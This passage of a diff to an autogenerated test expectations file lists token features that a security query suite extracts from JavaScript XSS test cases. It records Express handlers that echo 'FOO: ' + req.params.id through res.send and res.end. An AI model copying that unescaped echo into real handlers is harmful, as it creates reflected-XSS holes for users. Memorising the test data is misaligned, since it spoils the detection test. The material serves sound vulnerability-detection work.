autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:4 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:4 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:9 | res.send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:9 | res.send | contextSurroundingFunctionParameters | (req, res)\n() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:9 | res.send | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:9 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:9 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:34 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:34 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:34 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:34 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:34 | exceptional return of res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:34 | res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:34 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res)\n() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:34 | res.sen ... ams.id) | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:34 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:34 | res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:6:76:9 | send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:6:76:9 | send | contextSurroundingFunctionParameters | (req, res)\n() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:6:76:9 | send | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:6:76:9 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:6:76:9 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:17 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:17 | "FOO: " | contextSurroundingFunctionParameters | (req, res)\n() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:17 | "FOO: " | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:17 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:17 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:17 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:33 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:33 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:33 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20696,6 +137476,63 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:33 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:33 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:11:76:33 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:23 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:23 | req | contextSurroundingFunctionParameters | (req, res)\n() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:23 | req | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:23 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:23 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:30 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:30 | req.params | contextSurroundingFunctionParameters | (req, res)\n() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:30 | req.params | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:30 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:30 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:33 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:33 | req.params.id | contextSurroundingFunctionParameters | (req, res)\n() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:33 | req.params.id | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:33 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:33 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:21:76:33 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:25:76:30 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:25:76:30 | params | contextSurroundingFunctionParameters | (req, res)\n() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:25:76:30 | params | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:25:76:30 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:25:76:30 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:32:76:33 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:32:76:33 | id | contextSurroundingFunctionParameters | (req, res)\n() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:32:76:33 | id | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:32:76:33 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:32:76:33 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:5 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:5 | res | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:5 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:9 | res.end | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:9 | res.end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:9 | res.end | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:9 | res.end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:9 | res.end | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:34 | exceptional return of res.end ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:34 | exceptional return of res.end ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:34 | exceptional return of res.end ... ams.id) | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:34 | exceptional return of res.end ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:34 | exceptional return of res.end ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:34 | res.end ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:34 | res.end ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:34 | res.end ... ams.id) | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:34 | res.end ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:3:78:34 | res.end ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:7:78:9 | end | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:7:78:9 | end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:7:78:9 | end | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:7:78:9 | end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:7:78:9 | end | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:17 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:17 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:17 | "FOO: " | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:17 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:17 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:17 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:33 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.end | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:33 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:33 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20704,24 +137541,197 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:33 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:33 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:11:78:33 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:23 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:23 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:23 | req | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:23 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:23 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:30 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:30 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:30 | req.params | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:30 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:30 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:33 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:33 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:33 | req.params.id | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:33 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:33 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:21:78:33 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:25:78:30 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:25:78:30 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:25:78:30 | params | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:25:78:30 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:25:78:30 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:32:78:33 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:32:78:33 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:32:78:33 | id | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:32:78:33 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:78:32:78:33 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:0 | this | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:0 | this | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:1 | require | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:1 | require | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:1 | sendTextResponse | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:1 | sendTextResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:1 | sendTextResponse | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:1 | url | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:1:1:1 | url | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:7:1:9 | url | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:7:1:9 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:7:1:9 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:7:1:9 | url | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:7:1:26 | url | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:7:1:26 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:7:1:26 | url | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:7:1:26 | url = require("url") | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:7:1:26 | url = require("url") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:7:1:26 | url = require("url") | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:13:1:19 | require | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:13:1:19 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:13:1:19 | require | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:13:1:26 | exceptional return of require("url") | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:13:1:26 | exceptional return of require("url") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:13:1:26 | exceptional return of require("url") | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:13:1:26 | require("url") | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:13:1:26 | require("url") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:13:1:26 | require("url") | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:21:1:25 | "url" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:21:1:25 | "url" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:21:1:25 | "url" | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:21:1:25 | "url" | contextFunctionInterfaces | sendTextResponse(resp, text) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:21:1:25 | "url" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:1:21:1:25 | "url" | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:7 | require | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:7 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:7 | require | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:15 | exceptional return of require("http") | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:15 | exceptional return of require("http") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:15 | exceptional return of require("http") | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:15 | require("http") | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:15 | require("http") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:15 | require("http") | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:28 | require ... eServer | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:28 | require ... eServer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:3:28 | require ... eServer | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:6:2 | exceptional return of require ... ame)\\n}) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:6:2 | exceptional return of require ... ame)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:6:2 | exceptional return of require ... ame)\\n}) | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:6:2 | require ... ame)\\n}) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:6:2 | require ... ame)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:1:6:2 | require ... ame)\\n}) | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:9:3:14 | "http" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:9:3:14 | "http" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:9:3:14 | "http" | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:9:3:14 | "http" | contextFunctionInterfaces | sendTextResponse(resp, text) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:9:3:14 | "http" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:9:3:14 | "http" | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:17:3:28 | createServer | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:17:3:28 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:17:3:28 | createServer | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | sendTextResponse | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | sendTextResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | sendTextResponse | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | sendTextResponse | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | sendTextResponse | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | this | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | this | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | this | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | this | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | url | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | url | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | url | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:3:29 | url | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | 'arguments' object of anonymous function | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | 'arguments' object of anonymous function | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | exceptional return of anonymous function | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | exceptional return of anonymous function | enclosingFunctionBody | req resp target url parse req url true sendTextResponse resp target pathname | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | exceptional return of anonymous function | enclosingFunctionName | createServer#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | exceptional return of anonymous function | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | functio ... name)\\n} | CalleeFlexibleAccessPath | import(!).createServer | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | functio ... name)\\n} | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:3:30:6:1 | functio ... 